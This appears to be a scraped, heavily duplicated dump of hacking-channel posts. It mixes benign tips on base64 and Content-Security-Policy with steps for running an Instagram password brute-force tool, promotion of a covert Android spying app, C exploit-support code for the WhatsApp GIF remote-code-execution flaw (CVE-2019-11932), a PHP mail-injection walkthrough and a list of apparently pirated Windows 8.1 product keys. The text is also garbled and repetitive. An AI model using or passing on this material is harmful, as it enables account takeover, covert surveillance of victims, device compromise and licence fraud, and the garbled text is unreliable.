β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Base64 Encode and Decode From Command Line :
how to use the base64 command to encode and decode the data in a string or a file ?
example We have performed the commands on Ubuntu 20.04 Focal Fossa system. However, you can also run the same commands on other Linux distributions. For running the commands, we have used the command line Terminal application, which can be accessed using the Ctrl+Alt+T keyboard shortcut.
A) Base64 Syntax
1) Here is the syntax for encoding using Base64:
base64 [OPTION] [FILE]
Options
Some of the command-line options that can be used with base64 command are:
-d or --decode
2) Use this option to decode a file or a string.
--help
Use this option to display help regarding the usage of base64.
-i, --ignore-garbage
Use this option while decoding to ignore non-alphabet characters
--version
Use this option to display version information
B) Encoding String
You can easily encode a string using the base64 command. For instance, to encode a sample text βWelcome to Linuxβ to base64, the command would be:
$ echo βWelcome to Linuxβ | base64
1) This command will encode the text in the string using base64 and print the encoded text to standard output
2) You can also save the encoded output to a file rather than printing to standard output using the redirection operator (>). The following command will encode the text and save the output to a file named βencodedfile.txt:
$ echo βWelcome to Linuxβ | base64 > encodedfile.txt
3) To view the encoded file, you can use the cat command:
$ cat encodedfile.txt
C) Decoding String
1) You can also decode the base64 encoded text using the βdecode or -d option. For instance to decode base64 encoded text βV2VsY29tZSB0byBMaW51eAo=β, the command would be:
$ echo βV2VsY29tZSB0byBMaW51eAo=β | base64 --decode
2) This command will decode the base64 encoded text and print the original text on the standard outpuT
3) You can also save the decoded output to a file rather than printing to standard output using the redirection operator (>). The following command will decode the encoded text and save the original text to a file named βdecodedfile.txt:
$ echo βV2VsY29tZSB0byBMaW51eAo=β | base64 βdecode > decodedfile.txt
E) Encoding Text File
The base64 command can also be used to encode a text file. For instance, to encode a text file named βtestfile.txtβ, the command would be:
$ base64 testfile.txt
unix forum
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Base64 Encode and Decode From Command Line :
how to use the base64 command to encode and decode the data in a string or a file ?
example We have performed the commands on Ubuntu 20.04 Focal Fossa system. However, you can also run the same commands on other Linux distributions. For running the commands, we have used the command line Terminal application, which can be accessed using the Ctrl+Alt+T keyboard shortcut.
A) Base64 Syntax
1) Here is the syntax for encoding using Base64:
base64 [OPTION] [FILE]
Options
Some of the command-line options that can be used with base64 command are:
-d or --decode
2) Use this option to decode a file or a string.
--help
Use this option to display help regarding the usage of base64.
-i, --ignore-garbage
Use this option while decoding to ignore non-alphabet characters
--version
Use this option to display version information
B) Encoding String
You can easily encode a string using the base64 command. For instance, to encode a sample text βWelcome to Linuxβ to base64, the command would be:
$ echo βWelcome to Linuxβ | base64
1) This command will encode the text in the string using base64 and print the encoded text to standard output
2) You can also save the encoded output to a file rather than printing to standard output using the redirection operator (>). The following command will encode the text and save the output to a file named βencodedfile.txt:
$ echo βWelcome to Linuxβ | base64 > encodedfile.txt
3) To view the encoded file, you can use the cat command:
$ cat encodedfile.txt
C) Decoding String
1) You can also decode the base64 encoded text using the βdecode or -d option. For instance to decode base64 encoded text βV2VsY29tZSB0byBMaW51eAo=β, the command would be:
$ echo βV2VsY29tZSB0byBMaW51eAo=β | base64 --decode
2) This command will decode the base64 encoded text and print the original text on the standard outpuT
3) You can also save the decoded output to a file rather than printing to standard output using the redirection operator (>). The following command will decode the encoded text and save the original text to a file named βdecodedfile.txt:
$ echo βV2VsY29tZSB0byBMaW51eAo=β | base64 βdecode > decodedfile.txt
E) Encoding Text File
The base64 command can also be used to encode a text file. For instance, to encode a text file named βtestfile.txtβ, the command would be:
$ base64 testfile.txt
unix forum
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack instagram via linux :
π»π΄π 'π π π π°π π :
1) git clone https://github.com/Ethical-H4CK3R/Instagram.git
this command will clone the entire program/script to your computer.
2) and now you need to chmod the file and open (go to) the directory of the program.
Type
> chmod -R 755 Instagram && cd Instagram
3) Now that we cloned the program/script, we now need to open the program.
> Type :
"ls"
to see what is inside the folder.
4) Now, as we know that there are three things inside the program/script folder, "Core", "README.md" and "instagram.py".
5) The executable program here is "instagram.py".
We need to execute the program. So type:
python instagram.py
6) For setup proxies https://www.serverlab.ca/tutorials/linux/administration-linux/how-to-configure-proxy-on-ubuntu-18-04/
7) for setup worldlist
https://www.youtube.com/watch?v=GUNA0THt4a4
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack instagram via linux :
π»π΄π 'π π π π°π π :
1) git clone https://github.com/Ethical-H4CK3R/Instagram.git
this command will clone the entire program/script to your computer.
2) and now you need to chmod the file and open (go to) the directory of the program.
Type
> chmod -R 755 Instagram && cd Instagram
3) Now that we cloned the program/script, we now need to open the program.
> Type :
"ls"
to see what is inside the folder.
4) Now, as we know that there are three things inside the program/script folder, "Core", "README.md" and "instagram.py".
5) The executable program here is "instagram.py".
We need to execute the program. So type:
python instagram.py
6) For setup proxies https://www.serverlab.ca/tutorials/linux/administration-linux/how-to-configure-proxy-on-ubuntu-18-04/
7) for setup worldlist
https://www.youtube.com/watch?v=GUNA0THt4a4
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Bitwise-01/Instagram-: Bruteforce attack for Instagram.
Bruteforce attack for Instagram. . Contribute to Bitwise-01/Instagram- development by creating an account on GitHub.
π¦FREE ANDROID SPYING APPLICATION :
Remote access to the complete database of the targeted device with full invisibility on targeted devices.
Remote access the LIVE SCREEN SHARING OF TARGETED DEVICE
Remotely access to WEB HISTORY(in processing)
Remotely MONITORING MULTIPLE DEVICES AT A TIME WITH
BETTER CONSOLE
REALTIME WEB CONSOLE FOR MONITORING AND CONTROLLING
BETTER UX/UI DESIGN EXPERIENCE
Β» https://github.com/ranaaditya/SPYZIER-APP
(open source)
β β β Uππ»βΊπ«Δπ¬πβ β β β
Remote access to the complete database of the targeted device with full invisibility on targeted devices.
Remote access the LIVE SCREEN SHARING OF TARGETED DEVICE
Remotely access to WEB HISTORY(in processing)
Remotely MONITORING MULTIPLE DEVICES AT A TIME WITH
BETTER CONSOLE
REALTIME WEB CONSOLE FOR MONITORING AND CONTROLLING
BETTER UX/UI DESIGN EXPERIENCE
Β» https://github.com/ranaaditya/SPYZIER-APP
(open source)
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ranaaditya/SPYZIER-APP: Android spying app and Parental controller app.
Android spying app and Parental controller app. Contribute to ranaaditya/SPYZIER-APP development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create your own antivirus-malware detection tools & tutorials :
* [File Scanning Framework](https://github.com/EmersonElectricCo/fsf) -
Modular, recursive file scanning solution.
* [Generic File Parser](https://github.com/uppusaikiran/generic-parser) - A Single Library Parser to extract meta information,static analysis and detect macros within the files.
* [hashdeep](https://github.com/jessek/hashdeep) - Compute digest hashes with
a variety of algorithms.
* [HashCheck](https://github.com/gurnec/HashCheck) - Windows shell extension
to compute hashes with a variety of algorithms.
* [Loki](https://github.com/Neo23x0/Loki) - Host based scanner for IOCs.
* [Malfunction](https://github.com/Dynetics/Malfunction) - Catalog and
compare malware at a function level.
* [Manalyze](https://github.com/JusticeRage/Manalyze) - Static analyzer for PE
executables.
* [MASTIFF](https://github.com/KoreLogicSecurity/mastiff) - Static analysis
framework.
* [MultiScanner](https://github.com/mitre/multiscanner) - Modular file
scanning/analysis framework
don't clone our tutorials
git
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create your own antivirus-malware detection tools & tutorials :
* [File Scanning Framework](https://github.com/EmersonElectricCo/fsf) -
Modular, recursive file scanning solution.
* [Generic File Parser](https://github.com/uppusaikiran/generic-parser) - A Single Library Parser to extract meta information,static analysis and detect macros within the files.
* [hashdeep](https://github.com/jessek/hashdeep) - Compute digest hashes with
a variety of algorithms.
* [HashCheck](https://github.com/gurnec/HashCheck) - Windows shell extension
to compute hashes with a variety of algorithms.
* [Loki](https://github.com/Neo23x0/Loki) - Host based scanner for IOCs.
* [Malfunction](https://github.com/Dynetics/Malfunction) - Catalog and
compare malware at a function level.
* [Manalyze](https://github.com/JusticeRage/Manalyze) - Static analyzer for PE
executables.
* [MASTIFF](https://github.com/KoreLogicSecurity/mastiff) - Static analysis
framework.
* [MultiScanner](https://github.com/mitre/multiscanner) - Modular file
scanning/analysis framework
don't clone our tutorials
git
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - EmersonElectricCo/fsf: File Scanning Framework
File Scanning Framework. Contribute to EmersonElectricCo/fsf development by creating an account on GitHub.
WARNING! we receive many reports, some bad guys, use our profiles, names ! pictures or logos for a while & chatting peopleβs talking with Impersonation.
For chatting with undercode for support or help, dm admins in groups or go to social media only, or emails
Support@UndercodeTesting.com
Support@UndercodeNews.com
and thanks you.
For chatting with undercode for support or help, dm admins in groups or go to social media only, or emails
Support@UndercodeTesting.com
Support@UndercodeNews.com
and thanks you.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The real lastest Whatsapp cve :
Finally uploaded
# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)
/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/
#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>
typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;
//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}
//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}
//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}
//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The real lastest Whatsapp cve :
Finally uploaded
# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)
/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/
#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>
typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;
//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}
//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}
//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}
//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
β β β Uππ»βΊπ«Δπ¬πβ β β β
WhatsApp.com
WhatsApp | Secure and Reliable Free Private Messaging and Calling
Use WhatsApp Messenger to stay in touch with friends and family. WhatsApp is free and offers simple, secure, reliable messaging and calling, available on phones all over the world.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦New tip :
The
You can simply list your sources after a directive as a space-separated list:
Everything below the specified parameters is implicitly allowed. That means that in the example above these would be valid sources:
The most common directives are:
There are others, but these are the ones you're most likely to need.
3. How can I use multiple directives?
You define all your directives inside one meta-tag by terminating them with a semicolon (
Everything but the default ports needs to be allowed explicitly by adding the port number or an asterisk after the allowed domain:
By default, only standard protocols are allowed. For example to allow WebSockets
If you'll try to define it as such it wonβt work. Instead, you'll allow it with the
Unless explicitly allowed, you can't use inline style definitions, code inside
I'm sure many people would say that you don't, since 'eval is evil' and the most likely cause for the impending end of the world. Those people would be wrong. Sure, you can definitely punch major holes into your site's security with eval, but it has perfectly valid use cases. You just have to be smart about using it. You allow it like so:
You might take
Unixforum
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦New tip :
The
Content-Security-Policy
1. How can I allow multiple sources?You can simply list your sources after a directive as a space-separated list:
content="default-src 'self' https://example.com/js/"
Note that there are no quotes around parameters other than the special ones, like 'self'. Also, there's no colon (:) after the directive. Just the directive, then a space-separated list of parameters.Everything below the specified parameters is implicitly allowed. That means that in the example above these would be valid sources:
https://example.com/js/file.js
https://example.com/js/subdir/anotherfile.js
These, however, would not be valid:http://example.com/js/file.js
^^^^ wrong protocol
https://example.com/file.js
^^ above the specified path
2. How can I use different directives? What do they each do?The most common directives are:
β’ default-src the default policy for loading javascript, images, CSS, fonts, AJAX requests, etc β’ script-src defines valid sources for javascript files β’ style-src defines valid sources for css files β’ img-src defines valid sources for images β’ connect-src defines valid targets for to XMLHttpRequest (AJAX), WebSockets or EventSource. If a connection attempt is made to a host that's not allowed here, the browser will emulate a 400 errorThere are others, but these are the ones you're most likely to need.
3. How can I use multiple directives?
You define all your directives inside one meta-tag by terminating them with a semicolon (
;):content="default-src 'self' https://example.com/js/; style-src 'self'"
4. How can I handle ports?Everything but the default ports needs to be allowed explicitly by adding the port number or an asterisk after the allowed domain:
content="default-src 'self' https://ajax.googleapis.com http://example.com:123/free/stuff/"
The above would result in:https://ajax.googleapis.com:123
^^^^ Not ok, wrong port
https://ajax.googleapis.com - OK
http://example.com/free/stuff/file.js
^^ Not ok, only the port 123 is allowed
http://example.com:123/free/stuff/file.js - OK
As I mentioned, you can also use an asterisk to explicitly allow all ports:content="default-src example.com:*"
5. How can I handle different protocols?By default, only standard protocols are allowed. For example to allow WebSockets
ws:// you will have to allow it explicitly:content="default-src 'self'; connect-src ws:; style-src 'self'"
^^^ web Sockets are now allowed on all domains and ports.
6. How can I allow the file protocol file://?If you'll try to define it as such it wonβt work. Instead, you'll allow it with the
filesystem parameter:content="default-src filesystem"
7. How can I use inline scripts and style definitions?Unless explicitly allowed, you can't use inline style definitions, code inside
<script> tags or in tag properties like onclick. You allow them like so:content="script-src 'unsafe-inline'; style-src 'unsafe-inline'"
You'll also have to explicitly allow inline, base64 encoded images:content="img-src data:"
8. How can I allow eval()?I'm sure many people would say that you don't, since 'eval is evil' and the most likely cause for the impending end of the world. Those people would be wrong. Sure, you can definitely punch major holes into your site's security with eval, but it has perfectly valid use cases. You just have to be smart about using it. You allow it like so:
content="script-src 'unsafe-eval'"
9. What exactly does 'self' mean?You might take
'self' to mean localhost, local filesystem, or anything on the same host. It doesn't mean any of those. It means sources that have the same scheme (protocol), same host, and same port as the file the content policy is defined in. Serving your site over HTTP? No https for you then, unless you define it explicitly.Unixforum
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PHP mail injection practical exercise by Undercode :
1) Introduction
Today, the use of the Internet has risen sharply, but the vast majority of Internet users have no security knowledge background. Most people use the Internet to communicate with others via email. For this reason, most websites allow their users to contact them, provide suggestions to the website, report a problem, or request feedback, and the user will send the feedback to the website administratorβs email.
Unfortunately, most web developers don't have enough knowledge of Code-Security. Some of them use existing libraries or frameworks, which are subject to many known vulnerabilities. These vulnerabilities have been announced, and the manufacturers have patched them, and the corresponding attack source code poc is downloadable on the Internet, but most developers are too lazy to upgrade to the latest version.
Today we are going to talk about email injection, an attacker can use your mail server to send spam.
2) Email injection
E-mail injection is a security loophole, which is widely present in Internet email receiving and sending applications. This is similar to email injection and HTTP header injection. Similar to SQL injection attacks, this type of vulnerability is a common type of vulnerability that occurs when one programming language is embedded in another, such as MYSQL embedded in PHP.
When a form that can submit data to a web application is added to a web page, malicious users may use the MIME format to add additional information to the message to be sent (POST/GET), such as a new recipient list or A completely different message body. Because the MIME format uses carriage returns to separate the information in the data packet (there is a newline character between each line in the HTTP packet, and there are two newline characters between POST and HTTP HEADER), submit the form data by adding a carriage return ( It can be easily done using some plug-ins of FB), which allows a simple message board to be used to send thousands of messages. Similarly, a spammer can use this tactic to maliciously send a large number of anonymous messages.
Email injection is a type of attack against the built-in mail function of PHP. It allows malicious attackers to inject any email header fields, BCC, CC, subject, etc., and it allows hackers to send spam from the victim's mail server by injection. For this reason, this type of attack is called email injection, or spam in the form of mail. This vulnerability is not limited to PHP. It may affect any application that receives messages from the user UI and sends email messages. The main reason for this kind of attack is improper user input validation or the application has no authentication and filtering mechanism at all.
3) Third, the attack principle of email injection
The old Chinese saying goes well: Only by knowing it can you know why.
In order to explain the working principle of email injection, we must first understand the working principle of the PHP Email function. Below is the API explanation found in the PHP Manual
mail():
http://www.php.net/manual/en/function.mail.php
bool mail (string $to, string $subject, string $message [, string $additional_headers [, string $additional_parameters ]])
You can notice that this requires three required parameters ("Destination, Subject and Message") and some other optional parameters and the function returns a Boolean value.
https://pastebin.com/gfrEEmGa
NOW SEE THIS CODE :
first part
<?php
$to=" littlehann@foxmail.com ";
if (!isset($_POST["send"])){
?>
This code will check the form submission or not. The response of the user clicking the submit button and the script of normal visiting this page will be different. If this code returns True (the final result of the if statement is true), it means that the form is not submitted. The form will appear, waiting for user input. On the other hand, if it returns "False", it means that the form has been submitted, so the email will be sent.
the second part
π¦PHP mail injection practical exercise by Undercode :
1) Introduction
Today, the use of the Internet has risen sharply, but the vast majority of Internet users have no security knowledge background. Most people use the Internet to communicate with others via email. For this reason, most websites allow their users to contact them, provide suggestions to the website, report a problem, or request feedback, and the user will send the feedback to the website administratorβs email.
Unfortunately, most web developers don't have enough knowledge of Code-Security. Some of them use existing libraries or frameworks, which are subject to many known vulnerabilities. These vulnerabilities have been announced, and the manufacturers have patched them, and the corresponding attack source code poc is downloadable on the Internet, but most developers are too lazy to upgrade to the latest version.
Today we are going to talk about email injection, an attacker can use your mail server to send spam.
2) Email injection
E-mail injection is a security loophole, which is widely present in Internet email receiving and sending applications. This is similar to email injection and HTTP header injection. Similar to SQL injection attacks, this type of vulnerability is a common type of vulnerability that occurs when one programming language is embedded in another, such as MYSQL embedded in PHP.
When a form that can submit data to a web application is added to a web page, malicious users may use the MIME format to add additional information to the message to be sent (POST/GET), such as a new recipient list or A completely different message body. Because the MIME format uses carriage returns to separate the information in the data packet (there is a newline character between each line in the HTTP packet, and there are two newline characters between POST and HTTP HEADER), submit the form data by adding a carriage return ( It can be easily done using some plug-ins of FB), which allows a simple message board to be used to send thousands of messages. Similarly, a spammer can use this tactic to maliciously send a large number of anonymous messages.
Email injection is a type of attack against the built-in mail function of PHP. It allows malicious attackers to inject any email header fields, BCC, CC, subject, etc., and it allows hackers to send spam from the victim's mail server by injection. For this reason, this type of attack is called email injection, or spam in the form of mail. This vulnerability is not limited to PHP. It may affect any application that receives messages from the user UI and sends email messages. The main reason for this kind of attack is improper user input validation or the application has no authentication and filtering mechanism at all.
3) Third, the attack principle of email injection
The old Chinese saying goes well: Only by knowing it can you know why.
In order to explain the working principle of email injection, we must first understand the working principle of the PHP Email function. Below is the API explanation found in the PHP Manual
mail():
http://www.php.net/manual/en/function.mail.php
bool mail (string $to, string $subject, string $message [, string $additional_headers [, string $additional_parameters ]])
You can notice that this requires three required parameters ("Destination, Subject and Message") and some other optional parameters and the function returns a Boolean value.
https://pastebin.com/gfrEEmGa
NOW SEE THIS CODE :
first part
<?php
$to=" littlehann@foxmail.com ";
if (!isset($_POST["send"])){
?>
This code will check the form submission or not. The response of the user clicking the submit button and the script of normal visiting this page will be different. If this code returns True (the final result of the if statement is true), it means that the form is not submitted. The form will appear, waiting for user input. On the other hand, if it returns "False", it means that the form has been submitted, so the email will be sent.
the second part
Pastebin
UTC - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
<form method="POST" action="<?echo $_SERVER['PHP_SELF'];?>">
From: <input type="text" name="sender">
Subject: <input type="text" name ="subject">
Message:
<textarea name="message" rows="10" cols="60" lines="20"></textarea>
<input type="submit" name="send" value="Send ">
</form> The
second part is an HTML form tag, which requires user input.
MORE: https://pastebin.com/f8YAfm2P
π¦Fourth, mail injection demonstration
notice:
In order to use PHP as a mailing agent, we need to configure PHP.INI:
[mail function]
; For Win32 only
.; http://php.net/smtp
SMTP = smtp.qq.com
; http://php.net/smtp-port
smtp_port = 25
For demonstration purposes, we will use the previous The vulnerable code. In addition, we will submit the following values ββas parameters for sending emails:
mail(" littlehann@foxmail.com ", "Call me urgent", "Hi,nPlease call me ASAP.nBye", "From: Test@UndercodeTesting.com ")
HTTP packet sent ...
π¦From the attacker's point of view, there are many additional fields that can be injected in the email header. See RFC 822 for more information. For example, CC (carbon copy) or BCC (blind copy) allows the attacker to insert more messages.
But it should be noted that before we add a new parameter, we must add a newline to separate each field. The hexadecimal value of the newline character is "0x0A"
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
From: <input type="text" name="sender">
Subject: <input type="text" name ="subject">
Message:
<textarea name="message" rows="10" cols="60" lines="20"></textarea>
<input type="submit" name="send" value="Send ">
</form> The
second part is an HTML form tag, which requires user input.
MORE: https://pastebin.com/f8YAfm2P
π¦Fourth, mail injection demonstration
notice:
In order to use PHP as a mailing agent, we need to configure PHP.INI:
[mail function]
; For Win32 only
.; http://php.net/smtp
SMTP = smtp.qq.com
; http://php.net/smtp-port
smtp_port = 25
For demonstration purposes, we will use the previous The vulnerable code. In addition, we will submit the following values ββas parameters for sending emails:
mail(" littlehann@foxmail.com ", "Call me urgent", "Hi,nPlease call me ASAP.nBye", "From: Test@UndercodeTesting.com ")
HTTP packet sent ...
π¦From the attacker's point of view, there are many additional fields that can be injected in the email header. See RFC 822 for more information. For example, CC (carbon copy) or BCC (blind copy) allows the attacker to insert more messages.
But it should be noted that before we add a new parameter, we must add a newline to separate each field. The hexadecimal value of the newline character is "0x0A"
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Pastebin
PHP UTC - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
List of Windows 8.1 Product/Serial Keys 2019
GCRJD-8NW9H-F2CDX-CCM8D-9D6T9
334NH-RXG76-64THK-C7CKG-D3VPT
MHF9N-XY6XB-WVXMC-BTDCT-MKKG7
TT4HM-HN7YT-62K67-RGRQJ-JFFXW
FHQNR-XYXYC-8PMHT-TV4PH-DRQ3H
HMCNV-VVBFX-7HMBH-CTY9B-B4FXY
XHQ8N-C3MCJ-RQXB6-WCHYG-C9WKB
MNDGV-M6PKV-DV4DR-CYY8X-2YRXH
Windows 8.1 DVD Keys
KQWNF-XPMXP-HDK3M-GBV69-Y7RDH
MMRNH-BMB4F-87JR9-D72RY-MY2KV
N4WY8-DVW92-GM8WF-CG872-HH3G7
ND8P2-BD2PB-DD8HM-2926R-CRYQH
Windows 8.1 Ultimate Product Keys
NTTX3-RV7VB-T7X7F-WQYYY-9Y92F
Windows 8.1 Pro Product Key
3FCND-JTWFM-24VQ8-QXTMB-TXT67
GX9N8-4H2FH-D987T-BQ9GK-XKT67
KKPMN-469HY-H6V43-T8VX2-8W8XV
T3NJK-3P683-2T7BJ-2X27F-8B2KV
DNJXJ-7XBW8-2378T-X22TX-BKG7J
MBFBV-W3DP2-2MVKN-PJCQD-KKTF7
6RH4V-HNTWC-JQKG8-RFR3R-36498
4Y8N3-H7MMW-C76VJ-YD3XV-MBDKV
28VNV-HF42G-K2WM9-JXRJQ-2WBQW
Windows 8.1 Enterprise Keys
MHF9N-XY6XB-WVXMC-BTDCT-MKKG7
Windows 8.1 Serial Keys
TGXN4-BPPYC-TJYMH-3WXFK-4JMQH
N9C46-MKKKR-2TTT8-FJCJP-4RDG7
Q4NBQ-3DRJD-777XK-MJHDC-749T7
4NMMK-QJH7K-F38H2-FQJ24-2J8XV
84NRV-6CJR6-DBDXH-FYTBF-4X49V
D7KN2-CBVPG-BC7YC-9JDVJ-YPWXV
3NHJ7-3WWQK-4RFTH-8FHJY-PRYQH
988NM-XKXT9-7YFWH-H2Q3Q-C34DH
2VTNH-323J4-BWP98-TX9JR-FCWXV
Windows 8.1 (Core | Multiple Editions) Keys
GCRJD-8NW9H-F2CDX-CCM8D-9D6T9
334NH-RXG76-64THK-C7CKG-D3VPT
MHF9N-XY6XB-WVXMC-BTDCT-MKKG7
TT4HM-HN7YT-62K67-RGRQJ-JFFXW
FHQNR-XYXYC-8PMHT-TV4PH-DRQ3H
HMCNV-VVBFX-7HMBH-CTY9B-B4FXY
XHQ8N-C3MCJ-RQXB6-WCHYG-C9WKB
MNDGV-M6PKV-DV4DR-CYY8X-2YRXH
Windows 8.1 DVD Keys
KQWNF-XPMXP-HDK3M-GBV69-Y7RDH
MMRNH-BMB4F-87JR9-D72RY-MY2KV
N4WY8-DVW92-GM8WF-CG872-HH3G7
ND8P2-BD2PB-DD8HM-2926R-CRYQH
Windows 8.1 Ultimate Product Keys
NTTX3-RV7VB-T7X7F-WQYYY-9Y92F
Windows 8.1 Pro Product Key
3FCND-JTWFM-24VQ8-QXTMB-TXT67
GX9N8-4H2FH-D987T-BQ9GK-XKT67
KKPMN-469HY-H6V43-T8VX2-8W8XV
T3NJK-3P683-2T7BJ-2X27F-8B2KV
DNJXJ-7XBW8-2378T-X22TX-BKG7J
MBFBV-W3DP2-2MVKN-PJCQD-KKTF7
6RH4V-HNTWC-JQKG8-RFR3R-36498
4Y8N3-H7MMW-C76VJ-YD3XV-MBDKV
28VNV-HF42G-K2WM9-JXRJQ-2WBQW
Windows 8.1 Enterprise Keys
